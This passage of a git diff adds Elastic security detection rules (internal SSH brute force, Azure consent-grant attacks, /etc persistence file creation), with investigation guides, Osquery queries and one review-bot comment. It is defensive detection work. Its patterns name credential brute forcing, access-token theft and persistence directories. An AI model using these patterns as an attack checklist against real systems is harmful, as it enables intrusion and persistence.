"https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "1b21abcc-4d9f-4b08-a7f5-316f5f94b973_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_10.json b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_10.json new file mode 100644 index 00000000000..3ce208e2a92 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c27fa22-7727-4dd3-81c0-de6da5555feb_10.json 
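Review bot: The `setup` text states the rule requires data from "Elastic Defend" or "Auditbeat" and carries a full Auditbeat setup section, but `index` lists only `"logs-endpoint.events.*"`, `related_integrations` only the endpoint package, and `tags` only `Data Source: Elastic Defend`, so Auditbeat-sourced events would never be queried by this rule. Either add the Auditbeat index pattern (`"auditbeat-*"`) to `index` and reflect it in `tags`, or drop the Auditbeat section from `setup`, so operators are not told to onboard a data source the rule ignores. A minor point in the same text: the agent-policy link is pinned to `fleet/8.10/` while every other link uses `current/`. If this file is exported from an upstream rule source, the correction presumably belongs there.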
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies multiple internal consecutive login failures targeting a user account from the same source address within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to these accounts.", + "from": "now-9m", + "index": [ + "logs-system.auth-*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 5, + "name": "Potential Internal Linux SSH Brute Force Detected", + "note": "## Triage and analysis\n\n### Investigating Potential Internal Linux SSH Brute Force Detected\n\nThe rule identifies consecutive internal SSH login failures targeting a user account from the same source IP address to the same target host indicating brute force login attempts.\n\n#### Possible investigation steps\n\n- Investigate the login failure user name(s).\n- Investigate the source IP address of the failed ssh login attempt(s).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Infrastructure or availability issue.\n\n### Related Rules\n\n- Potential External Linux SSH Brute Force Detected - fa210b61-b627-4e5e-86f4-17e8270656ab\n- Potential SSH Password Guessing - 8cb84371-d053-4f4f-bce0-c74990e28f28\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, source.ip, user.name with maxspan=15s\n [ authentication where host.os.type == \"linux\" and \n event.action in (\"ssh_login\", \"user_login\") and event.outcome == \"failure\" and\n cidrmatch(source.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \n \"::1\", \"FE80::/10\", \"FF00::/8\") ] with runs = 10\n", + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c27fa22-7727-4dd3-81c0-de6da5555feb", + "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight 
shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential 
Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + "subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 10 + }, + "id": "1c27fa22-7727-4dd3-81c0-de6da5555feb_10", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_107.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_107.json new file mode 100644 index 00000000000..19c7eb5748e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_107.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user grants permissions to an Azure-registered application or when an administrator grants tenant-wide permissions to an application. An adversary may create an Azure-registered application that requests access to data such as contact information, email, or documents.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-azure*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Possible Consent Grant Attack via Azure-Registered Application", + "note": "## Triage and analysis\n\n### Investigating Possible Consent Grant Attack via Azure-Registered Application\n\nIn an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting that application consent to access their data either through a phishing attack, or by injecting illicit code into a trusted website. After the illicit application has been granted consent, it has account-level access to data without the need for an organizational account. Normal remediation steps like resetting passwords for breached accounts or requiring multi-factor authentication (MFA) on accounts are not effective against this type of attack, since these are third-party applications and are external to the organization.\n\nOfficial Microsoft guidance for detecting and remediating this attack can be found [here](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants).\n\n#### Possible investigation steps\n\n- From the Azure AD portal, Review the application that was granted permissions:\n - Click on the `Review permissions` button on the `Permissions` blade of the application.\n - An app should require only permissions related to the app's purpose. 
If that's not the case, the app might be risky.\n - Apps that require high privileges or admin consent are more likely to be risky.\n- Investigate the app and the publisher. The following characteristics can indicate suspicious apps:\n - A low number of downloads.\n - Low rating or score or bad comments.\n - Apps with a suspicious publisher or website.\n - Apps whose last update is not recent. This might indicate an app that is no longer supported.\n- Export and examine the [Oauth app auditing](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#oauth-app-auditing) to identify users affected.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Malicious applications abuse the same workflow used by legitimate apps. Thus, analysts must review each app consent to ensure that only desired apps are granted access.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Disable the malicious application to stop user access and the application access to your data.\n- Revoke the application Oauth consent grant. The `Remove-AzureADOAuth2PermissionGrant` cmdlet can be used to complete this task.\n- Remove the service principal application role assignment. The `Remove-AzureADServiceAppRoleAssignment` cmdlet can be used to complete this task.\n- Revoke the refresh token for all users assigned to the application. 
Azure provides a [playbook](https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks/Revoke-AADSignInSessions) for this task.\n- [Report](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#send-feedback) the application as malicious to Microsoft.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Investigate the potential for data compromise from the user's email and file sharing services. Activate your Data Loss incident response playbook.\n- Disable the permission for a user to set consent permission on their behalf.\n - Enable the [Admin consent request](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) feature.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and\n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", + "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", + "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + }, + { + 
"package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Operation", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 107 + }, + "id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_107", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_109.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_109.json new file mode 100644 index 00000000000..814f3a60363 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_109.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user grants permissions to an Azure-registered application or when an administrator grants tenant-wide permissions to an application. An adversary may create an Azure-registered application that requests access to data such as contact information, email, or documents.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-azure*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Possible Consent Grant Attack via Azure-Registered Application", + "note": "## Triage and analysis\n\n### Investigating Possible Consent Grant Attack via Azure-Registered Application\n\nIn an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting that application consent to access their data either through a phishing attack, or by injecting illicit code into a trusted website. After the illicit application has been granted consent, it has account-level access to data without the need for an organizational account. Normal remediation steps like resetting passwords for breached accounts or requiring multi-factor authentication (MFA) on accounts are not effective against this type of attack, since these are third-party applications and are external to the organization.\n\nOfficial Microsoft guidance for detecting and remediating this attack can be found [here](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants).\n\n#### Possible investigation steps\n\n- From the Azure AD portal, Review the application that was granted permissions:\n - Click on the `Review permissions` button on the `Permissions` blade of the application.\n - An app should require only permissions related to the app's purpose. 
If that's not the case, the app might be risky.\n - Apps that require high privileges or admin consent are more likely to be risky.\n- Investigate the app and the publisher. The following characteristics can indicate suspicious apps:\n - A low number of downloads.\n - Low rating or score or bad comments.\n - Apps with a suspicious publisher or website.\n - Apps whose last update is not recent. This might indicate an app that is no longer supported.\n- Export and examine the [Oauth app auditing](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#oauth-app-auditing) to identify users affected.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Malicious applications abuse the same workflow used by legitimate apps. Thus, analysts must review each app consent to ensure that only desired apps are granted access.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Disable the malicious application to stop user access and the application access to your data.\n- Revoke the application Oauth consent grant. The `Remove-AzureADOAuth2PermissionGrant` cmdlet can be used to complete this task.\n- Remove the service principal application role assignment. The `Remove-AzureADServiceAppRoleAssignment` cmdlet can be used to complete this task.\n- Revoke the refresh token for all users assigned to the application. 
Azure provides a [playbook](https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks/Revoke-AADSignInSessions) for this task.\n- [Report](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#send-feedback) the application as malicious to Microsoft.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Investigate the potential for data compromise from the user's email and file sharing services. Activate your Data Loss incident response playbook.\n- Disable the permission for a user to set consent permission on their behalf.\n - Enable the [Admin consent request](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) feature.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and\n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", + "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", + "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + }, + { + 
"package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Operation", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_109", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_111.json b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_111.json new file mode 100644 index 00000000000..9a1fb35b644 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_111.json 
@@ -0,0 +1,122 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a user grants permissions to an Azure-registered application or when an administrator grants tenant-wide permissions to an application. An adversary may create an Azure-registered application that requests access to data such as contact information, email, or documents.", + "from": "now-25m", + "index": [ + "filebeat-*", + "logs-azure*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Possible Consent Grant Attack via Azure-Registered Application", + "note": "## Triage and analysis\n\n### Investigating Possible Consent Grant Attack via Azure-Registered Application\n\nIn an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting that application consent to access their data either through a phishing attack, or by injecting illicit code into a trusted website. After the illicit application has been granted consent, it has account-level access to data without the need for an organizational account. Normal remediation steps like resetting passwords for breached accounts or requiring multi-factor authentication (MFA) on accounts are not effective against this type of attack, since these are third-party applications and are external to the organization.\n\nOfficial Microsoft guidance for detecting and remediating this attack can be found [here](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants).\n\n#### Possible investigation steps\n\n- From the Azure AD portal, Review the application that was granted permissions:\n - Click on the `Review permissions` button on the `Permissions` blade of the application.\n - An app should require only permissions related to the app's purpose. 
If that's not the case, the app might be risky.\n - Apps that require high privileges or admin consent are more likely to be risky.\n- Investigate the app and the publisher. The following characteristics can indicate suspicious apps:\n - A low number of downloads.\n - Low rating or score or bad comments.\n - Apps with a suspicious publisher or website.\n - Apps whose last update is not recent. This might indicate an app that is no longer supported.\n- Export and examine the [Oauth app auditing](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#oauth-app-auditing) to identify users affected.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Malicious applications abuse the same workflow used by legitimate apps. Thus, analysts must review each app consent to ensure that only desired apps are granted access.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Disable the malicious application to stop user access and the application access to your data.\n- Revoke the application Oauth consent grant. The `Remove-AzureADOAuth2PermissionGrant` cmdlet can be used to complete this task.\n- Remove the service principal application role assignment. The `Remove-AzureADServiceAppRoleAssignment` cmdlet can be used to complete this task.\n- Revoke the refresh token for all users assigned to the application. 
Azure provides a [playbook](https://github.com/Azure/Azure-Sentinel/tree/master/Playbooks/Revoke-AADSignInSessions) for this task.\n- [Report](https://docs.microsoft.com/en-us/defender-cloud-apps/manage-app-permissions#send-feedback) the application as malicious to Microsoft.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Investigate the potential for data compromise from the user's email and file sharing services. Activate your Data Loss incident response playbook.\n- Disable the permission for a user to set consent permission on their behalf.\n - Enable the [Admin consent request](https://docs.microsoft.com/en-us/azure/active-directory/manage-apps/configure-admin-consent-workflow) feature.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "event.dataset:(azure.activitylogs or azure.auditlogs or o365.audit) and\n (\n azure.activitylogs.operation_name:\"Consent to application\" or\n azure.auditlogs.operation_name:\"Consent to application\" or\n o365.audit.Operation:\"Consent to application.\"\n ) and\n event.outcome:(Success or success)\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/detect-and-remediate-illicit-consent-grants?view=o365-worldwide", + "https://www.cloud-architekt.net/detection-and-mitigation-consent-grant-attacks-azuread/", + "https://docs.microsoft.com/en-us/defender-cloud-apps/investigate-risky-oauth#how-to-detect-risky-oauth-apps" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + }, + { + "package": "azure", + "version": "^1.0.0" + }, + { + 
"package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Operation", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft 365", + "Use Case: Identity and Access Audit", + "Resources: Investigation Guide", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1528", + "name": "Steal Application Access Token", + "reference": "https://attack.mitre.org/techniques/T1528/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 111 + }, + "id": "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38_111", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_113.json b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_113.json new file mode 100644 index 00000000000..d8364209914 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1c84dd64-7e6c-4bad-ac73-a5014ee37042_113.json 
@@ -0,0 +1,171 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the manual creation of files in specific etc directories, via user root, used by Linux malware to persist and elevate privileges on compromised systems. File creation in these directories should not be entirely common and could indicate a malicious binary or script installing persistence mechanisms for long term access.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation in /etc for Persistence", + "note": "## Triage and analysis\n\n### Investigating Suspicious File Creation in /etc for Persistence\n\nThe /etc/ directory in Linux is used to store system-wide configuration files and scripts.\n\nBy creating or modifying specific system-wide configuration files, attackers can leverage system services to execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities.\n\nThis rule monitors for the creation of the most common system-wide configuration files and scripts abused by attackers for persistence. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n- Investigate whether any other files in any of the commonly abused directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path LIKE '/etc/ld.so.conf.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/sudoers.d/%' OR\\n path LIKE '/etc/rc%.d/%' OR\\n path LIKE '/etc/init.d/%' OR\\n path LIKE '/etc/systemd/system/%' OR\\n path LIKE '/usr/lib/systemd/system/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path LIKE '/etc/ld.so.conf.d/%' OR\\n path LIKE '/etc/cron.d/%' OR\\n path LIKE '/etc/sudoers.d/%' OR\\n path LIKE '/etc/rc%.d/%' OR\\n path LIKE '/etc/init.d/%' OR\\n path LIKE '/etc/systemd/system/%' OR\\n path LIKE '/usr/lib/systemd/system/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze 